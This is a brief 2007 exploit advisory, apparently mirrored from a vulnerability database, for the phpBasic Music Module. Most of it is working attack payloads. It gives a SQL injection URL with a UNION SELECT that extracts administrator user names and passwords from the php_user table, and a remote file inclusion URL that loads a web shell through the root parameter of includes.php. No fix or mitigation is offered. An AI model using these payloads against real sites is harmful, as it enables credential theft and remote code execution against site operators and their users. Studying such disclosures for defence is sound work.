Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18278
HistoryOct 24, 2007 - 12:00 a.m.

[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

2007-10-2400:00:00
vulners.com
20

Software : phpBasic Music Module
Homepage : http://phpbasic.com/

  1. SQL Injection by Xcross87 :
    Proof of concept :
    http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]
    Xploit admin user account :
    http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

  2. RFI by Alucar

Xploit :
http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== …::Xcross87::… | …::Alucar::… | HCETeam Xploiter | HCEGroup.Vn ===